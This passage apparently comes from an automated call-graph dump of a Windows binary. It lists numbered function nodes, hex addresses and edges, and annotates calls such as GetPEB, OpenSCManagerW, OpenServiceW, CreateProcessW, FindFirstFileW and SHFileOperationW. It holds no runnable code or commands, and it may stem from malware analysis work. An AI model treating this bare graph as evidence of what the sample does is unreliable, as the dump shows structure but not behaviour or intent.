6085->6087 6088 3e7290 6085->6088 6086 3e3f00 GetPEB 6089 3e7254 6086->6089 6090 3e3f00 GetPEB 6087->6090 6093 3e72b8 6088->6093 6096 3e3f00 GetPEB 6088->6096 6091 3e3e60 GetPEB 6089->6091 6092 3e7284 6090->6092 6094 3e7260 6091->6094 6095 3e3e60 GetPEB 6092->6095 6093->6070 6094->6085 6095->6088 6097 3e72ac 6096->6097 6098 3e3e60 GetPEB 6097->6098 6098->6093 6108 3e8ea0 6099->6108 6100 3e901b 6102 3e8fc6 6100->6102 6103 3e3f00 GetPEB 6100->6103 6101 3e8ff2 OpenServiceW 6101->6108 6102->6070 6105 3e902e 6103->6105 6104 3e3f00 GetPEB 6104->6108 6106 3e3e60 GetPEB 6105->6106 6106->6102 6107 3e3e60 GetPEB 6107->6108 6108->6100 6108->6101 6108->6102 6108->6104 6108->6107 6119 3e8991 6109->6119 6110 3e34c0 GetPEB 6110->6119 6111 3e8b74 6113 3e8add 6111->6113 6114 3e3f00 GetPEB 6111->6114 6113->6070 6115 3e8b87 6114->6115 6118 3e3e60 GetPEB 6115->6118 6116 3e3f00 GetPEB 6116->6119 6117 3e3e60 GetPEB 6117->6119 6118->6113 6119->6110 6119->6111 6119->6113 6119->6116 6119->6117 6120 3e3460 GetPEB 6119->6120 6398 3e5040 6119->6398 6120->6119 6133 3e8163 6121->6133 6122 3e34c0 GetPEB 6122->6133 6123 3e8397 CreateFileW 6124 3e83ee 6123->6124 6123->6133 6124->6070 6125 3e83c7 6126 3e83eb CloseHandle 6125->6126 6128 3e3f00 GetPEB 6125->6128 6126->6124 6127 3e8358 6127->6070 6129 3e83da 6128->6129 6130 3e3e60 GetPEB 6129->6130 6131 3e83e6 6130->6131 6131->6126 6132 3e3f00 GetPEB 6132->6133 6133->6122 6133->6123 6133->6125 6133->6127 6133->6132 6134 3e3e60 GetPEB 6133->6134 6134->6133 6150 3e9880 6135->6150 6136 3e9b02 6138 3e9b26 SHGetFolderPathW 6136->6138 6141 3e3f00 GetPEB 6136->6141 6137 3e99b2 OpenSCManagerW 6137->6150 6423 3e3040 6138->6423 6139 3e3f00 GetPEB 6139->6150 6140 3e9969 SHGetFolderPathW 6140->6150 6145 3e9b15 6141->6145 6142 3e9a66 CloseServiceHandle 6142->6150 6147 3e3e60 GetPEB 6145->6147 6146 3e9af5 6146->6070 6148 3e9b21 6147->6148 6148->6138 6149 3e3e60 GetPEB 6149->6150 6150->6136 6150->6137 6150->6139 6150->6140 6150->6142 6150->6146 6150->6149 6428 3e7c60 6150->6428 6159 3e9630 6151->6159 6152 3e9829 6452 3e3780 6152->6452 6153 3e34c0 GetPEB 6153->6159 6154 3e981f 6154->6070 6156 3e9839 6156->6070 6157 3e3f00 GetPEB 6157->6159 6158 3e3e60 GetPEB 6158->6159 6159->6152 6159->6153 6159->6154 6159->6157 6159->6158 6178 3e12e1 6160->6178 6162 3e181c 6581 3e4220 6162->6581 6164 3e4220 GetPEB 6164->6178 6165 3e1823 6165->6070 6166 3e42c0 GetPEB 6166->6178 6168 3e17d1 6168->6070 6170 3e34c0 GetPEB 6170->6178 6173 3e3f00 GetPEB 6173->6178 6174 3e1641 _snwprintf 6177 3e3460 GetPEB 6174->6177 6177->6178 6178->6162 6178->6164 6178->6165 6178->6166 6178->6168 6178->6170 6178->6173 6178->6174 6179 3e3e60 GetPEB 6178->6179 6181 3e3460 GetPEB 6178->6181 6479 3e1fc0 6178->6479 6487 3e1e70 6178->6487 6496 3e5c00 6178->6496 6515 3e1c70 6178->6515 6531 3e2230 6178->6531 6539 3e2be0 6178->6539 6554 3e4ea0 6178->6554 6559 3e1900 6178->6559 6179->6178 6181->6178 6183 3eb101 6182->6183 6186 3eaff8 6182->6186 6183->6070 6184 3e3e60 GetPEB 6184->6186 6185 3e3f00 GetPEB 6185->6186 6186->6183 6186->6184 6186->6185 6188 3e8709 6187->6188 6189 3e871f 6187->6189 6190 3e3f00 GetPEB 6188->6190 6189->6070 6191 3e8713 6190->6191 6192 3e3e60 GetPEB 6191->6192 6192->6189 6623 3e5500 6193->6623 6195 3e613c 6197 3e35c0 GetPEB 6195->6197 6196 3e6134 6196->6070 6199 3e6147 6197->6199 6198 3e3f00 GetPEB 6202 3e6074 6198->6202 6201 3e6168 6199->6201 6203 3e3f00 GetPEB 6199->6203 6200 3e3e60 GetPEB 6200->6202 6206 3e61a2 6201->6206 6207 3e3f00 GetPEB 6201->6207 6202->6195 6202->6196 6202->6198 6202->6200 6204 3e615c 6203->6204 6205 3e3e60 GetPEB 6204->6205 6205->6201 6210 3e61ca 6206->6210 6211 3e3f00 GetPEB 6206->6211 6208 3e6196 6207->6208 6209 3e3e60 GetPEB 6208->6209 6209->6206 6210->6070 6212 3e61be 6211->6212 6213 3e3e60 GetPEB 6212->6213 6213->6210 6216 3eb440 6214->6216 6215 3eb4ba 6215->6070 6216->6215 6633 3eab50 6216->6633 6649 3ea170 6216->6649 6670 3ea7a0 6216->6670 6690 3ea5e0 6216->6690 6228 3e9f40 6221->6228 6222 3ea01b 6223 3e9f64 6222->6223 6224 3e3f00 GetPEB 6222->6224 6223->6070 6225 3ea02e 6224->6225 6227 3e3e60 GetPEB 6225->6227 6226 3e3f00 GetPEB 6226->6228 6227->6223 6228->6222 6228->6223 6228->6226 6229 3e3e60 GetPEB 6228->6229 6229->6228 6239 3e6202 6230->6239 6231 3e42c0 GetPEB 6231->6239 6232 3e624b 6232->6070 6235 3e3e60 GetPEB 6235->6239 6236 3e3f00 GetPEB 6236->6239 6237 3e6490 6237->6070 6238 3e3f00 GetPEB 6240 3e642d 6238->6240 6239->6231 6239->6232 6239->6235 6239->6236 6239->6240 6805 3e55b0 6239->6805 6814 3e4c80 6239->6814 6240->6237 6240->6238 6241 3e3e60 GetPEB 6240->6241 6241->6240 6243 3e94f0 6242->6243 6244 3e95c2 6243->6244 6246 3e4c80 GetPEB 6243->6246 6247 3e3f00 GetPEB 6243->6247 6248 3e3e60 GetPEB 6243->6248 6823 3e46c0 6243->6823 6244->6070 6246->6243 6247->6243 6248->6243 6250 3e334a 6249->6250 6251 3e336f 6250->6251 6252 3e3f00 GetPEB 6250->6252 6255 3e3f00 GetPEB 6251->6255 6258 3e3397 6251->6258 6253 3e3363 6252->6253 6254 3e3e60 GetPEB 6253->6254 6254->6251 6256 3e338b 6255->6256 6257 3e3e60 GetPEB 6256->6257 6257->6258 6258->6070 6260 3e184c 6259->6260 6261 3e1862 6259->6261 6262 3e3f00 GetPEB 6260->6262 6265 3e3f00 GetPEB 6261->6265 6269 3e188b 6261->6269 6263 3e1856 6262->6263 6264 3e3e60 GetPEB 6263->6264 6264->6261 6266 3e187f 6265->6266 6267 3e3e60 GetPEB 6266->6267 6267->6269 6268 3e18ee 6268->6070 6269->6268 6269->6269 6838 3e25e0 6269->6838 6271 3e18d8 6272 3e18dc 6271->6272 6273 3e4220 GetPEB 6271->6273 6272->6070 6273->6268 6275 3e346d 6274->6275 6278 3e3483 6274->6278 6276 3e3f00 GetPEB 6275->6276 6277 3e3477 6276->6277 6279 3e3e60 GetPEB 6277->6279 6280 3e3f00 GetPEB 6278->6280 6282 3e34ab 6278->6282 6279->6278 6281 3e349f 6280->6281 6283 3e3e60 GetPEB 6281->6283 6282->6070 6283->6282 6285 3e53e0 6284->6285 6286 3e3f00 GetPEB 6285->6286 6287 3e54b4 6285->6287 6288 3e3e60 GetPEB 6285->6288 6286->6285 6287->6070 6288->6285 6297 3e9290 6289->6297 6291 3e949c 6292 3e9410 6291->6292 6293 3e3f00 GetPEB 6291->6293 6292->6070 6295 3e94af 6293->6295 6294 3e3f00 GetPEB 6294->6297 6296 3e3e60 GetPEB 6295->6296 6296->6292 6297->6291 6297->6292 6297->6294 6298 3e3e60 GetPEB 6297->6298 6853 3e1000 6297->6853 6298->6297 6308 3e8bc4 6299->6308 6300 3e8d1d 6862 3e36b0 6300->6862 6301 3e3780 2 API calls 6301->6308 6303 3e8d10 6303->6070 6305 3e34c0 GetPEB 6305->6308 6306 3e3f00 GetPEB 6306->6308 6307 3e3e60 GetPEB 6307->6308 6308->6300 6308->6301 6308->6303 6308->6305 6308->6306 6308->6307 6310 3e72d9 6309->6310 6311 3e72ef 6309->6311 6312 3e3f00 GetPEB 6310->6312 6315 3e7318 6311->6315 6316 3e3f00 GetPEB 6311->6316 6313 3e72e3 6312->6313 6314 3e3e60 GetPEB 6313->6314 6314->6311 6315->6070 6317 3e730c 6316->6317 6318 3e3e60 GetPEB 6317->6318 6318->6315 6331 3e9070 6319->6331 6320 3e91de 6320->6070 6321 3e91e4 6322 3e921f 6321->6322 6323 3e3f00 GetPEB 6321->6323 6327 3e9247 6322->6327 6328 3e3f00 GetPEB 6322->6328 6325 3e9213 6323->6325 6324 3e3e60 GetPEB 6324->6331 6326 3e3e60 GetPEB 6325->6326 6326->6322 6327->6070 6330 3e923b 6328->6330 6329 3e3f00 GetPEB 6329->6331 6332 3e3e60 GetPEB 6330->6332 6331->6320 6331->6321 6331->6324 6331->6329 6332->6327 6334 3e4785 6333->6334 6335 3e479b 6333->6335 6336 3e3f00 GetPEB 6334->6336 6337 3e47cb GetCurrentProcessId 6335->6337 6338 3e3f00 GetPEB 6335->6338 6339 3e478f 6336->6339 6341 3e47d5 6337->6341 6340 3e47b7 6338->6340 6342 3e3e60 GetPEB 6339->6342 6343 3e3e60 GetPEB 6340->6343 6341->6070 6342->6335 6344 3e47c3 6343->6344 6344->6337 6349 3eb2ec 6345->6349 6346 3eb422 6346->6033 6347 3e3f00 GetPEB 6347->6349 6348 3e3e60 GetPEB 6348->6349 6349->6346 6349->6347 6349->6348 6354 3eb1e0 6350->6354 6351 3eb2b2 6351->6070 6352 3e3e60 GetPEB 6352->6354 6353 3e3f00 GetPEB 6353->6354 6354->6351 6354->6352 6354->6353 6359 3e7420 6355->6359 6356 3e7608 6356->6070 6357 3e3f00 GetPEB 6357->6359 6358 3e4fd0 GetPEB 6358->6359 6359->6356 6359->6357 6359->6358 6360 3e3e60 GetPEB 6359->6360 6360->6359 6368 3e8d50 6361->6368 6362 3e8e3f 6363 3e4b70 2 API calls 6362->6363 6365 3e8e4f 6363->6365 6364 3e8e29 6364->6052 6365->6052 6366 3e34c0 GetPEB 6366->6368 6367 3e3f00 GetPEB 6367->6368 6368->6362 6368->6364 6368->6366 6368->6367 6369 3e3e60 GetPEB 6368->6369 6369->6368 6376 3e8753 6370->6376 6371 3e34c0 GetPEB 6371->6376 6372 3e8903 6378 3e3f00 GetPEB 6372->6378 6379 3e8922 6372->6379 6374 3e88df 6374->6044 6375 3e8e80 2 API calls 6375->6376 6376->6371 6376->6372 6376->6374 6376->6375 6377 3e3f00 GetPEB 6376->6377 6385 3e3780 2 API calls 6376->6385 6386 3e3e60 GetPEB 6376->6386 6881 3e7700 6376->6881 6377->6376 6380 3e8916 6378->6380 6381 3e8955 6379->6381 6383 3e3f00 GetPEB 6379->6383 6382 3e3e60 GetPEB 6380->6382 6381->6044 6382->6379 6384 3e8949 6383->6384 6387 3e3e60 GetPEB 6384->6387 6385->6376 6386->6376 6387->6381 6389 3e34e3 6388->6389 6390 3e3f00 GetPEB 6389->6390 6393 3e3508 6389->6393 6391 3e34fc 6390->6391 6392 3e3e60 GetPEB 6391->6392 6392->6393 6394 3e3f00 GetPEB 6393->6394 6397 3e3530 6393->6397 6395 3e3524 6394->6395 6396 3e3e60 GetPEB 6395->6396 6396->6397 6397->6085 6397->6086 6412 3e505c 6398->6412 6399 3e5386 6402 3e53ae 6399->6402 6405 3e3f00 GetPEB 6399->6405 6400 3e5367 6400->6399 6401 3e3f00 GetPEB 6400->6401 6403 3e537a 6401->6403 6402->6119 6404 3e3e60 GetPEB 6403->6404 6404->6399 6409 3e53a2 6405->6409 6406 3e534d RtlAllocateHeap 6406->6402 6406->6412 6408 3e3f00 GetPEB 6408->6412 6410 3e3e60 GetPEB 6409->6410 6410->6402 6411 3e3e60 GetPEB 6411->6412 6412->6400 6412->6402 6412->6406 6412->6408 6412->6411 6413 3e42c0 6412->6413 6414 3e42cd 6413->6414 6415 3e42e3 6413->6415 6416 3e3f00 GetPEB 6414->6416 6419 3e3f00 GetPEB 6415->6419 6422 3e430b 6415->6422 6417 3e42d7 6416->6417 6418 3e3e60 GetPEB 6417->6418 6418->6415 6420 3e42ff 6419->6420 6421 3e3e60 GetPEB 6420->6421 6421->6422 6422->6412 6424 3e3050 6423->6424 6426 3e307a 6424->6426 6438 3e38f0 6424->6438 6426->6146 6427 3e3092 6427->6146 6434 3e7c80 6428->6434 6429 3e7ddd 6432 3e3f00 GetPEB 6429->6432 6433 3e7dfd 6429->6433 6430 3e7d97 6430->6150 6431 3e3f00 GetPEB 6431->6434 6436 3e7df1 6432->6436 6433->6150 6434->6429 6434->6430 6434->6431 6435 3e3e60 GetPEB 6434->6435 6435->6434 6437 3e3e60 GetPEB 6436->6437 6437->6433 6446 3e3910 6438->6446 6439 3e3a3b FindFirstFileW 6439->6446 6449 3e3b8f 6439->6449 6440 3e3ac1 6440->6427 6441 3e3b70 6443 3e3f00 GetPEB 6441->6443 6441->6449 6442 3e3f00 GetPEB 6442->6446 6445 3e3b83 6443->6445 6444 3e3e60 GetPEB 6444->6446 6447 3e3e60 GetPEB 6445->6447 6446->6439 6446->6440 6446->6441 6446->6442 6446->6444 6448 3e34c0 GetPEB 6446->6448 6450 3e38f0 GetPEB 6446->6450 6451 3e3460 GetPEB 6446->6451 6447->6449 6448->6446 6449->6427 6450->6446 6451->6446 6453 3e3795 6452->6453 6454 3e37ab 6452->6454 6455 3e3f00 GetPEB 6453->6455 6457 3e37dd 6454->6457 6459 3e3f00 GetPEB 6454->6459 6456 3e379f 6455->6456 6458 3e3e60 GetPEB 6456->6458 6462 3e3812 6457->6462 6463 3e3f00 GetPEB 6457->6463 6458->6454 6460 3e37d1 6459->6460 6461 3e3e60 GetPEB 6460->6461 6461->6457 6465 3e384a 6462->6465 6467 3e3f00 GetPEB 6462->6467 6464 3e3806 6463->6464 6466 3e3e60 GetPEB 6464->6466 6470 3e3f00 GetPEB 6465->6470 6471 3e3876 6465->6471 6466->6462 6468 3e383e 6467->6468 6469 3e3e60 GetPEB 6468->6469 6469->6465 6472 3e386a 6470->6472 6473 3e38d1 SHFileOperationW 6471->6473 6475 3e3f00 GetPEB 6471->6475 6474 3e3e60 GetPEB 6472->6474 6473->6156 6474->6471 6476 3e38c0 6475->6476 6477 3e3e60 GetPEB 6476->6477 6478 3e38cc 6477->6478 6478->6473 6485 3e1fd2 6479->6485 6480 3e2212 6481 3e2208 6480->6481 6483 3e4220 GetPEB 6480->6483 6481->6178 6482 3e42c0 GetPEB 6482->6485 6483->6481 6484 3e3f00 GetPEB 6484->6485 6485->6480 6485->6481 6485->6482 6485->6484 6486 3e3e60 GetPEB 6485->6486 6486->6485 6494 3e1e86 6487->6494 6488 3e1f77 6489 3e1f68 6488->6489 6490 3e3f00 GetPEB 6488->6490 6489->6178 6492 3e1f98 6490->6492 6491 3e3f00 GetPEB 6491->6494 6493 3e3e60 GetPEB 6492->6493 6493->6489 6494->6488 6494->6489 6494->6491 6495 3e3e60 GetPEB 6494->6495 6495->6494 6497 3e5c26 6496->6497 6498 3e5c10 6496->6498 6502 3e3f00 GetPEB 6497->6502 6506 3e5c4e 6497->6506 6499 3e3f00 GetPEB 6498->6499 6500 3e5c1a 6499->6500 6501 3e3e60 GetPEB 6500->6501 6501->6497 6503 3e5c42 6502->6503 6505 3e3e60 GetPEB 6503->6505 6504 3e5cd2 6504->6178 6505->6506 6506->6504 6507 3e5c99 6506->6507 6508 3e3f00 GetPEB 6506->6508 6511 3e3f00 GetPEB 6507->6511 6512 3e5cc1 6507->6512 6509 3e5c8d 6508->6509 6510 3e3e60 GetPEB 6509->6510 6510->6507 6513 3e5cb5 6511->6513 6512->6178 6514 3e3e60 GetPEB 6513->6514 6514->6512 6516 3e1d06 6515->6516 6517 3e1cf0 6515->6517 6521 3e3f00 GetPEB 6516->6521 6523 3e1dad 6516->6523 6518 3e3f00 GetPEB 6517->6518 6519 3e1cfa 6518->6519 6520 3e3e60 GetPEB 6519->6520 6520->6516 6522 3e1da1 6521->6522 6524 3e3e60 GetPEB 6522->6524 6525 3e1de1 6523->6525 6526 3e3f00 GetPEB 6523->6526 6524->6523 6529 3e4ea0 GetPEB 6525->6529 6527 3e1dd5 6526->6527 6528 3e3e60 GetPEB 6527->6528 6528->6525 6530 3e1e15 6529->6530 6530->6178 6532 3e2255 6531->6532 6533 3e3f00 GetPEB 6532->6533 6534 3e229c 6532->6534 6536 3e25be 6532->6536 6537 3e3e60 GetPEB 6532->6537 6533->6532 6534->6178 6535 3e25cd 6535->6178 6536->6535 6538 3e4220 GetPEB 6536->6538 6537->6532 6538->6535 6551 3e2c1a 6539->6551 6540 3e2fcf 6543 3e2fee 6540->6543 6544 3e3f00 GetPEB 6540->6544 6542 3e2cae 6542->6178 6543->6178 6547 3e2fe2 6544->6547 6545 3e3f00 GetPEB 6545->6551 6546 3e34c0 GetPEB 6546->6551 6548 3e3e60 GetPEB 6547->6548 6548->6543 6549 3e3e60 GetPEB 6549->6551 6550 3e3460 GetPEB 6550->6551 6551->6540 6551->6542 6551->6545 6551->6546 6551->6549 6551->6550 6552 3e4220 GetPEB 6551->6552 6591 3e56f0 6551->6591 6600 3e2980 6551->6600 6552->6551 6557 3e4eb6 6554->6557 6555 3e4f3d 6555->6178 6556 3e3f00 GetPEB 6556->6557 6557->6555 6557->6556 6558 3e3e60 GetPEB 6557->6558 6558->6557 6575 3e191f 6559->6575 6560 3e1bc6 6561 3e35c0 GetPEB 6560->6561 6563 3e1bd0 6561->6563 6562 3e1ba4 6562->6178 6564 3e1bf1 6563->6564 6565 3e3f00 GetPEB 6563->6565 6568 3e1c23 6564->6568 6571 3e3f00 GetPEB 6564->6571 6566 3e1be5 6565->6566 6570 3e3e60 GetPEB 6566->6570 6567 3e4e30 GetPEB 6567->6575 6576 3e3f00 GetPEB 6568->6576 6580 3e1c4b 6568->6580 6569 3e3e60 GetPEB 6569->6575 6570->6564 6572 3e1c17 6571->6572 6574 3e3e60 GetPEB 6572->6574 6573 3e3f00 GetPEB 6573->6575 6574->6568 6575->6560 6575->6562 6575->6567 6575->6569 6575->6573 6613 3e35c0 6575->6613 6577 3e1c3f 6576->6577 6578 3e3e60 GetPEB 6577->6578 6578->6580 6580->6178 6582 3e422d 6581->6582 6585 3e4243 6581->6585 6583 3e3f00 GetPEB 6582->6583 6584 3e4237 6583->6584 6586 3e3e60 GetPEB 6584->6586 6587 3e3f00 GetPEB 6585->6587 6589 3e426b 6585->6589 6586->6585 6588 3e425f 6587->6588 6590 3e3e60 GetPEB 6588->6590 6589->6165 6590->6589 6594 3e5701 6591->6594 6592 3e5723 6592->6551 6593 3e57e3 6593->6592 6596 3e3f00 GetPEB 6593->6596 6594->6592 6594->6593 6595 3e3f00 GetPEB 6594->6595 6599 3e3e60 GetPEB 6594->6599 6595->6594 6597 3e57f6 6596->6597 6598 3e3e60 GetPEB 6597->6598 6598->6592 6599->6594 6606 3e29a0 6600->6606 6601 3e2abf 6603 3e2b0c 6601->6603 6604 3e2ae4 6601->6604 6605 3e3f00 GetPEB 6601->6605 6602 3e3f00 GetPEB 6602->6606 6603->6551 6604->6603 6610 3e3f00 GetPEB 6604->6610 6607 3e2ad8 6605->6607 6606->6601 6606->6602 6609 3e3e60 GetPEB 6606->6609 6608 3e3e60 GetPEB 6607->6608 6608->6604 6609->6606 6611 3e2b00 6610->6611 6612 3e3e60 GetPEB 6611->6612 6612->6603 6614 3e35e4 6613->6614 6615 3e3609 6614->6615 6616 3e3f00 GetPEB 6614->6616 6619 3e3f00 GetPEB 6615->6619 6622 3e3631 6615->6622 6617 3e35fd 6616->6617 6618 3e3e60 GetPEB 6617->6618 6618->6615 6620 3e3625 6619->6620 6621 3e3e60 GetPEB 6620->6621 6621->6622 6622->6575 6624 3e5516 6623->6624 6629 3e552c 6623->6629 6625 3e3f00 GetPEB 6624->6625 6626 3e5520 6625->6626 6627 3e3e60 GetPEB 6626->6627 6627->6629 6628 3e5586 6628->6202 6629->6628 6630 3e3f00 GetPEB 6629->6630 6631 3e557a 6630->6631 6632 3e3e60 GetPEB 6631->6632 6632->6628 6644 3eab66 6633->6644 6636 3eac52 6638 3eac71 6636->6638 6640 3e3f00 GetPEB 6636->6640 6637 3eab8c 6637->6216 6643 3eac99 6638->6643 6645 3e3f00 GetPEB 6638->6645 6639 3e3f00 GetPEB 6639->6644 6641 3eac65 6640->6641 6642 3e3e60 GetPEB 6641->6642 6642->6638 6643->6216 6644->6636 6644->6637 6644->6639 6646 3e3e60 GetPEB 6644->6646 6706 3e4b70 6644->6706 6728 3eacd0 6644->6728 6647 3eac8d 6645->6647 6646->6644 6648 3e3e60 GetPEB 6647->6648 6648->6643 6669 3ea189 6649->6669 6650 3eacd0 GetPEB 6650->6669 6651 3ea552 6653 3ea571 6651->6653 6656 3e3f00 GetPEB 6651->6656 6652 3ea439 6652->6216 6662 3ea599 6653->6662 6663 3e3f00 GetPEB 6653->6663 6655 3e34c0 GetPEB 6655->6669 6658 3ea565 6656->6658 6657 3e4220 GetPEB 6657->6669 6660 3e3e60 GetPEB 6658->6660 6659 3e4b70 2 API calls 6659->6669 6660->6653 6662->6216 6664 3ea58d 6663->6664 6666 3e3e60 GetPEB 6664->6666 6665 3e3460 GetPEB 6665->6669 6666->6662 6667 3e3f00 GetPEB 6667->6669 6668 3e3e60 GetPEB 6668->6669 6669->6650 6669->6651 6669->6652 6669->6655 6669->6657 6669->6659 6669->6665 6669->6667 6669->6668 6738 3eb520 6669->6738 6746 3e1150 6669->6746 6675 3ea7c5 6670->6675 6671 3eaa19 6671->6216 6672 3eacd0 GetPEB 6672->6675 6673 3eaa7c GetCurrentProcessId 6673->6675 6674 3eaacd 6678 3e3f00 GetPEB 6674->6678 6682 3eaaec 6674->6682 6675->6671 6675->6672 6675->6673 6675->6674 6676 3e4b70 2 API calls 6675->6676 6680 3e42c0 GetPEB 6675->6680 6687 3e3f00 GetPEB 6675->6687 6689 3e3e60 GetPEB 6675->6689 6761 3e49a0 6675->6761 6771 3e4850 6675->6771 6676->6675 6681 3eaae0 6678->6681 6680->6675 6683 3e3e60 GetPEB 6681->6683 6684 3eab14 6682->6684 6685 3e3f00 GetPEB 6682->6685 6683->6682 6684->6216 6686 3eab08 6685->6686 6688 3e3e60 GetPEB 6686->6688 6687->6675 6688->6684 6689->6675 6699 3ea5ef 6690->6699 6691 3ea710 6691->6216 6692 3ea731 6694 3ea750 6692->6694 6696 3e3f00 GetPEB 6692->6696 6702 3ea778 6694->6702 6703 3e3f00 GetPEB 6694->6703 6695 3e42c0 GetPEB 6695->6699 6698 3ea744 6696->6698 6697 3e3f00 GetPEB 6697->6699 6700 3e3e60 GetPEB 6698->6700 6699->6691 6699->6692 6699->6695 6699->6697 6701 3e3e60 GetPEB 6699->6701 6780 3e4370 6699->6780 6700->6694 6701->6699 6702->6216 6704 3ea76c 6703->6704 6705 3e3e60 GetPEB 6704->6705 6705->6702 6707 3e4b98 6706->6707 6708 3e4b82 6706->6708 6711 3e4bd7 CreateProcessW 6707->6711 6713 3e3f00 GetPEB 6707->6713 6709 3e3f00 GetPEB 6708->6709 6710 3e4b8c 6709->6710 6712 3e3e60 GetPEB 6710->6712 6714 3e4c73 6711->6714 6717 3e4bf7 6711->6717 6712->6707 6715 3e4bc6 6713->6715 6714->6644 6718 3e3e60 GetPEB 6715->6718 6716 3e4bff 6716->6644 6717->6716 6719 3e4c33 6717->6719 6721 3e3f00 GetPEB 6717->6721 6720 3e4bd2 6718->6720 6723 3e4c5d 6719->6723 6725 3e3f00 GetPEB 6719->6725 6720->6711 6722 3e4c27 6721->6722 6724 3e3e60 GetPEB 6722->6724 6723->6644 6724->6719 6726 3e4c51 6725->6726 6727 3e3e60 GetPEB 6726->6727 6727->6723 6731 3eaced 6728->6731 6729 3e34c0 GetPEB 6729->6731 6730 3eaf9f 6732 3eaf37 6730->6732 6733 3e3f00 GetPEB 6730->6733 6731->6729 6731->6730 6731->6732 6734 3e3f00 GetPEB 6731->6734 6735 3e3e60 GetPEB 6731->6735 6732->6644 6736 3eafb2 6733->6736 6734->6731 6735->6731 6737 3e3e60 GetPEB 6736->6737 6737->6732 6739 3eb536 6738->6739 6740 3eb55f 6739->6740 6741 3eb633 6739->6741 6743 3e3e60 GetPEB 6739->6743 6744 3eb63f 6739->6744 6745 3e3f00 GetPEB 6739->6745 6740->6669 6755 3e4fd0 6741->6755 6743->6739 6744->6669 6745->6739 6754 3e1160 6746->6754 6747 3e124c 6748 3e1244 6747->6748 6749 3e3f00 GetPEB 6747->6749 6748->6669 6750 3e125f 6749->6750 6751 3e3e60 GetPEB 6750->6751 6751->6748 6752 3e3e60 GetPEB 6752->6754 6753 3e3f00 GetPEB 6753->6754 6754->6747 6754->6748 6754->6752 6754->6753 6756 3e4ff9 6755->6756 6757 3e500f 6755->6757 6758 3e3f00 GetPEB 6756->6758 6757->6744 6759 3e5003 6758->6759 6760 3e3e60 GetPEB 6759->6760 6760->6757 6766 3e49c0 6761->6766 6762 3e49ea 6762->6675 6763 3e4b37 6763->6762 6765 3e3f00 GetPEB 6763->6765 6764 3e3f00 GetPEB 6764->6766 6767 3e4b4a 6765->6767 6766->6762 6766->6763 6766->6764 6768 3e34c0 GetPEB 6766->6768 6770 3e3e60 GetPEB 6766->6770 6769 3e3e60 GetPEB 6767->6769 6768->6766 6769->6762 6770->6766 6779 3e4870 6771->6779 6772 3e496e 6774 3e3f00 GetPEB 6772->6774 6775 3e492c 6772->6775 6773 3e3f00 GetPEB 6773->6779 6776 3e4981 6774->6776 6775->6675 6777 3e3e60 GetPEB 6776->6777 6777->6775 6778 3e3e60 GetPEB 6778->6779 6779->6772 6779->6773 6779->6775 6779->6778 6781 3e450e 6780->6781 6782 3e4384 6780->6782 6781->6699 6782->6781 6783 3e3f00 GetPEB 6782->6783 6786 3e43d6 6782->6786 6784 3e43ca 6783->6784 6785 3e3e60 GetPEB 6784->6785 6785->6786 6787 3e3f00 GetPEB 6786->6787 6794 3e4436 6786->6794 6796 3e44f4 6786->6796 6788 3e442a 6787->6788 6789 3e3e60 GetPEB 6788->6789 6789->6794 6790 3e44ba 6800 3e4550 6790->6800 6792 3e3f00 GetPEB 6792->6794 6794->6790 6794->6792 6795 3e3e60 GetPEB 6794->6795 6795->6794 6796->6699 6797 3e3f00 GetPEB 6798 3e44e8 6797->6798 6799 3e3e60 GetPEB 6798->6799 6799->6796 6801 3e456b 6800->6801 6803 3e44d0 6800->6803 6802 3e3e60 GetPEB 6801->6802 6801->6803 6804 3e3f00 GetPEB 6801->6804 6802->6801 6803->6796 6803->6797 6804->6801 6808 3e55c6 6805->6808 6806 3e55e8 6806->6239 6807 3e56a8 6807->6806 6809 3e3f00 GetPEB 6807->6809 6808->6806 6808->6807 6810 3e3f00 GetPEB 6808->6810 6813 3e3e60 GetPEB 6808->6813 6811 3e56bb 6809->6811 6810->6808 6812 3e3e60 GetPEB 6811->6812 6812->6806 6813->6808 6822 3e4ca0 6814->6822 6815 3e4db4 6817 3e4d7c 6815->6817 6818 3e3f00 GetPEB 6815->6818 6816 3e3f00 GetPEB 6816->6822 6817->6239 6820 3e4dc7 6818->6820 6819 3e3e60 GetPEB 6819->6822 6821 3e3e60 GetPEB 6820->6821 6821->6817 6822->6815 6822->6816 6822->6817 6822->6819 6824 3e46d7 6823->6824 6830 3e46ed 6823->6830 6825 3e3f00 GetPEB 6824->6825 6826 3e46e1 6825->6826 6828 3e3e60 GetPEB 6826->6828 6827 3e4760 6827->6243 6828->6830 6829 3e4721 6834 3e4752 6829->6834 6835 3e3f00 GetPEB 6829->6835 6830->6827 6830->6829 6831 3e3f00 GetPEB 6830->6831 6832 3e4715 6831->6832 6833 3e3e60 GetPEB 6832->6833 6833->6829 6834->6243 6836 3e4746 6835->6836 6837 3e3e60 GetPEB 6836->6837 6837->6834 6850 3e25f0 6838->6850 6839 3e2937 6847 3e295f 6839->6847 6849 3e3f00 GetPEB 6839->6849 6840 3e2912 6840->6839 6841 3e3f00 GetPEB 6840->6841 6844 3e292b 6841->6844 6842 3e42c0 GetPEB 6842->6850 6843 3e2771 6843->6271 6846 3e3e60 GetPEB 6844->6846 6845 3e3e60 GetPEB 6845->6850 6846->6839 6847->6271 6848 3e3f00 GetPEB 6848->6850 6851 3e2953 6849->6851 6850->6840 6850->6842 6850->6843 6850->6845 6850->6848 6852 3e3e60 GetPEB 6851->6852 6852->6847 6858 3e1010 6853->6858 6854 3e1105 6856 3e103a 6854->6856 6857 3e3f00 GetPEB 6854->6857 6855 3e3f00 GetPEB 6855->6858 6856->6297 6859 3e1118 6857->6859 6858->6854 6858->6855 6858->6856 6861 3e3e60 GetPEB 6858->6861 6860 3e3e60 GetPEB 6859->6860 6860->6856 6861->6858 6863 3e34c0 GetPEB 6862->6863 6864 3e36c4 6863->6864 6865 3e36e5 6864->6865 6866 3e3f00 GetPEB 6864->6866 6869 3e371a 6865->6869 6870 3e3f00 GetPEB 6865->6870 6867 3e36d9 6866->6867 6868 3e3e60 GetPEB 6867->6868 6868->6865 6873 3e3742 6869->6873 6874 3e3f00 GetPEB 6869->6874 6871 3e370e 6870->6871 6872 3e3e60 GetPEB 6871->6872 6872->6869 6877 3e376e 6873->6877 6878 3e3f00 GetPEB 6873->6878 6875 3e3736 6874->6875 6876 3e3e60 GetPEB 6875->6876 6876->6873 6877->6070 6879 3e3762 6878->6879 6880 3e3e60 GetPEB 6879->6880 6880->6877 6882 3e7712 6881->6882 6883 3e34c0 GetPEB 6882->6883 6884 3e77b3 6882->6884 6885 3e3f00 